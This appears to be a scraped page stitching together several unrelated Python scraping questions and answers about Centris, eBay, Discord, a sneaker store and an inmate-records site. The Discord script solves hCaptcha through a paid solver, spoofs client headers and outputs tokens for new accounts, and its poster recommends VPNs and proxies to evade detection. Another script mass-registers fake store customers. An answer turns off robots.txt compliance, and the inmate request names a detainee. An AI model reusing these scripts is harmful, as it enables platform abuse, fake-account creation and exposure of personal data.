I am learning scrapy and am trying to scrape this realtor site in Quebec. I am using their API to collect homes and print the URLs to the screen. But my last function print_urls() won't run. I really am stuck here i tried debugging it and it just skips right over my whole function block.
class CentrishomesSpider(scrapy.Spider):
name = 'centrisHomes'
# allowed_domains = ['www.centris.ca']
# start_urls = ['http://www.centris.ca/']
def start_requests(self):
query = {...
}
yield scrapy.Request(
url='https://www.centris.ca/property/UpdateQuery',
method='POST',
body=json.dumps(query),
headers={
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'
},
callback=self.get_inscriptions
)
...
def get_inscriptions(self, response):
resp, success = self.success(response)
if success == True:
print(Fore.GREEN + 'Query Updated' + Style.RESET_ALL)
else:
print(Fore.RED + 'Query Not Updated' + Style.RESET_ALL)
yield scrapy.Request(
url='https://www.centris.ca/Property/GetInscriptions',
method='POST',
body=json.dumps({"startPosition": 0}),
headers={
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36'
},
callback=self.handle_inscriptions
)
def handle_inscriptions(self, response):
homes, success = self.success(response)
if success == True:
print(Fore.GREEN + 'Count ' + str(homes['d']['Result']['count']) + Style.RESET_ALL)
# self.test()
self.html = Selector(text=homes['d']['Result']['html'])
self.print_urls()
# print(response.body)
...
def success(self, response):
my_dict = literal_eval(response.body.decode(
'utf-8').replace(':true}', ':True}'))
if my_dict['d']['Succeeded'] == True:
return my_dict, True
else:
return False
def print_urls(self):
print('try')
# page_html = Selector(resp['d']['Result']['html'])
page_html = self.html
homes = page_html.xpath('//div[contains(#class, "property-thumbnail-item")]')
for home in homes:
yield{
'home_url':home.xpath('.//a[#class="property-thumbnail-summary-link"]/#href').get()
}
...
I figured out my own problem, it was because I turned my print_urls function into a generator, and calling self.print_urls() doesn't make my generator do anything. S/o #AbdealiJK I figured it out because of his answer.
https://stackoverflow.com/a/34609397/19966841
Related
from twocaptcha import TwoCaptcha
import json
import requests
import random
def rand(list):
return random.randrange(0, len(list))
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246',
'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1'
]
headers = {
'user-agent': user_agents[rand(user_agents)],
"accept": "*/*",
"authority": "discord.com",
"method": "POST",
"path": "/api/v9/auth/register",
"scheme": "https",
"origin": "discord.com",
"referer": "discord.com/register",
"x-debug-options": "bugReporterEnabled",
"accept-language": "en-US,en;q=0.9",
"connection": "keep-alive",
"content-Type": "application/json",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjIwMDAiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6MTA0OTY3LCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ==",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin"
}
solver = TwoCaptcha('redacted')
try:
result = solver.hcaptcha(
sitekey='4c672d35-0701-42b2-88c3-78380b0db560',
url='https://discord.com/register',
)
except Exception as e:
sys.exit(e)
else:
print(result['code'])
def getfingerprint():
request_url = "https://discord.com/api/v9/experiments?with_guild_experiments=true"
r = requests.get(request_url , headers = {
"user-agent": user_agents[rand(user_agents)],
"x-context-properties": "eyJsb2NhdGlvbiI6Ii9jaGFubmVscy9AbWUifQ==",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwNS4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTA1LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjE0NTQyOSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
})
if r.status_code == 200:
fingerprint = json.loads(r.text)["fingerprint"]
print(fingerprint)
else:
return r.text
payload = {
'captcha_key': result['code'],
'consent': True,
'date_of_birth': '2001-11-19',
'email': 'enter email',
'fingerprint': getfingerprint(),
'gift_code_sku_id': None,
'invite': None,
'password': 'enter username',
'username': 'enter password'
}
def register():
data = payload
res = requests.post('https://discord.com/api/v9/auth/register', headers = headers, json = data)
print('Token: ' + res.text)
if __name__ == '__main__':
register()
Code now works and generates accounts
just have to enter your own emails, username and password
can tell when it works cuz it outputs a token
if you get an error mentioning invalid hcaptcha response change email and use a vpn and try again
if you do decide to loop this have it loop slowly or setup proxies
I am a total noob using scrapy for the first time. I have set it up to get some information, but it always stops after 5 pages. I want it to scrape a lot more pages since at least 20 are available.
import scrapy
from myproject.items import EbaySold
class EbaySpider(scrapy.Spider):
name = 'EbaySold'
allowed_domains = ['www.ebay.com']
start_urls = ['https://www.ebay.com/b/Apple-Unlocked-Smartphones/9355/bn_599372?LH_Sold=1&mag=1&rt=nc&_dmd=1&_pgn=1&_sop=13']
def parse(self, response):
products = response.css('li.s-item')
product_item = EbaySold()
for product in products:
product_item['name'] = product.css('h3.s-item__title::text').get()
if product_item['name'] is None:
product_item['name'] = product.css('span.BOLD::text').get()
product_item['sold_price'] = product.css('span.POSITIVE::text').get()
product_item['date_sold'] = product.css('div.s-item__title-tag::text').get().replace('SOLD ', '')
yield product_item
next_page = response.css('a[type=next]').attrib['href']
if next_page is not None:
yield response.follow(next_page, callback=self.parse)
In your scrapy project settings.py file. Make sure you have the following settings configured.
ROBOTSTXT_OBEY = False
COOKIES_ENABLED = True
DEFAULT_REQUEST_HEADERS = {
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'accept-language': 'en-US,en;q=0.9',
'accept-encoding': 'gzip, deflate, br',
'sec-fetch-site': 'same-origin',
'upgrade-insecure-requests': 1,
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36'
}
CONCURRENT_REQUESTS = 2 # small number
Then try running the spider again.
This is my code I dont really know what is the issue its giving me a 404 everytime I run the code the URL does exist.
Any help appreciated
btw im pretty new to requests
The site doesnt have much protection as of what I know also it uses cloudflare but not heavily where it checks the browser.
import requests
import randominfo
from requests.models import Response
import random
import string
import time
lenght = 15
lower = string.ascii_lowercase
upper = string.ascii_uppercase
num = string.digits
sym = string.punctuation
all = lower + upper + num + sym
temp = random.sample(all,lenght)
password = "".join(temp)
with open(path, 'r') as configFile:
catchall = configFile.read()
login = randominfo.get_first_name() + '.' + randominfo.get_last_name() + catchall
passwordInput = password
passwordVeryfication = password
URLGet = 'https://de.afew-store.com'
url = 'https://de.afew-store.com/account/register'
RequestHeaders = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'referer': 'https://de.afew-store.com/',
'content-language': 'de',
'method': 'POST',
'server': 'cloudflare',
'x-content-type-options': 'nosniff',
'path': 'account',
'scheme': 'https',
}
getHeaders = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',
'location': 'https://de.afew-store.com/',
'server': 'cloudflare',
'x-content-type-options': 'nosniff',
'path': 'account',
'scheme': 'https',
}
firstName = randominfo.get_first_name()
lastName = randominfo.get_last_name()
customerEmail = firstName + lastName + catchall
s = requests.session()
signup = s.get(URLGet, headers=getHeaders)
payload = {
'form_type': 'create_customer',
'utf8': '✓',
'customer[tags]': 'lang:en',
'customer[first_name]': firstName,
'customer[last_name]': lastName,
'customer[email]': customerEmail,
'customer[password]': password,
}
login_info = s.post(url, headers=RequestHeaders, data=payload)
print(login_info.status_code)
The host https://de.afew-store.com is unknown. Maybe you mistyped it
ping https://de.afew-store.com
ping: cannot resolve https://de.afew-store.com: Unknown host
i'm sending below request to URL and get the response from it
import requests
url = "http://localhost/dat.txt"
payload = {}
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36',
'Sec-Fetch-Dest': 'document',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
response = requests.request("GET", url, headers=headers, data = payload)
print(response.text.encode('utf8'))
Below is the response data that I get -
mohame4|nameon#example.com|passsd!##$4|head,customer|manager,devlop
mohame3|nameon3#example.com|passsd!##$4|head,customer|manager,devlop
I do this with the data
for i in response.text:
try:
i = i.strip().split('|')
userna = i[0]
emaill = i[1]
passd = i[2]
rol1= i[3]
rol2= i[4]
except:
pass
How can I make rol1 as
this head,customer
to
rol1=['head','customer']
Simply split the string you're getting:
rol1 = i[3].split(',')
You could do this more... gracefully, though, using iterable unpacking:
username, email, password, rol1, rol2 = i.strip().split('|')
rol1 = rol1.split(',')
thanks for all helper special #ForceBru
import requests
url = "http://localhost/dat.txt"
response = requests.request("GET", url)
print(response.text)
dat = str(response.text).split('\n')
for i in dat:
i = i.strip().split('|')
print(i[3].split(","))
# TODO: write code...
I'm trying to scrape this site https://acsd.crimegraphics.com, but I am getting only one record. Also, I don't know how to do this in a loop. I'm not able to scrape specific data. Here is the code that I have come up with so far.
import re
import requests
headers = {}
headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3"
headers["Accept-Encoding"] = "gzip, deflate, br"
headers["Accept-Language"] = "en-GB,en-US;q=0.9,en;q=0.8"
headers["Cache-Control"] = "max-age=0"
headers["Connection"] = "keep-alive"
headers["Content-Length"] = "31688"
headers["Content-Type"] = "application/x-www-form-urlencoded"
headers["Cookie"] = "ASP.NET_SessionId=4z2ypzsqxnug03cf5ztitpfx; ExistingVisitor=ExistingVisitor=Y; __utma=114720600.1520129764.1565270251.1565270251.1565270251.1; __utmc=114720600; __utmz=114720600.1565270251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; __utmb=114720600.1.10.1565270251"
headers["Host"] = "acsd.crimegraphics.com"
headers["Origin"] = "https://acsd.crimegraphics.com"
headers["Referer"] = "https://acsd.crimegraphics.com/2013/default.aspx"
headers["Upgrade-Insecure-Requests"] = "1"
headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
payload = {}
payload["__EVENTTARGET"] = "MainMenu$InmatesMenu"
payload["__EVENTARGUMENT"] = "InmatesMenu"
url = "https://acsd.crimegraphics.com/2013/default.aspx"
r = requests.post(url, headers=headers, data=payload)
#print(r.text)
headers1 = {}
headers1["Accept"] = "*/*"
headers1["Accept-Encoding"] = "gzip, deflate, br"
headers1["Accept-Language"] = "en-GB,en-US;q=0.9,en;q=0.8"
headers1["Cache-Control"] = "no-cache"
headers1["Connection"] = "keep-alive"
headers1["Content-Length"] = "58838"
headers1["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
headers1["Cookie"] = "ASP.NET_SessionId=4z2ypzsqxnug03cf5ztitpfx; __utma=114720600.1520129764.1565270251.1565270251.1565270251.1; __utmc=114720600; __utmz=114720600.1565270251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=114720600.2.10.1565270251"
headers1["Host"] = "acsd.crimegraphics.com"
headers1["Origin"] = "https://acsd.crimegraphics.com"
headers1["Referer"] = "https://acsd.crimegraphics.com/2013/default.aspx"
headers1["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
payload1 = {}
payload1["ScriptManager1"] = "UpdatePanel1|gvInmates_ob_gvInmatesPE"
payload1["__EVENTTARGET"] = "gvInmates_ob_gvInmatesPE 77886"
payload1["__EVENTARGUMENT"] = ""
payload1["__LASTFOCUS"] = ""
payload1["__VIEWSTATE"] = ""
payload1["__VIEWSTATEGENERATOR"] = "38817EFB"
payload1["__VIEWSTATEENCRYPTED"] = ""
payload1["gvInmates$ob_gvInmatesSelectedRecordsContainer"] = "BOOKNO*_o_eg_*77882*_o_sep_*NAME*_o_eg_*GANNON%2C%20COURTNEY%20BETH*_o_sep_*BOOKDATE*_o_eg_*08%2F07%2F2019%2012%3A40*_o_sep_*ARSTAGENCY*_o_eg_*ACSO*_o_sep_*ARSTLOC*_o_eg_*SAN%20JOAQUIN%20CO*_o_sep_*STATUS*_o_eg_*In%20Custody*_o_osep_*true"
r2 = requests.post(url, headers=headers1, data=payload1)
print(r2.text)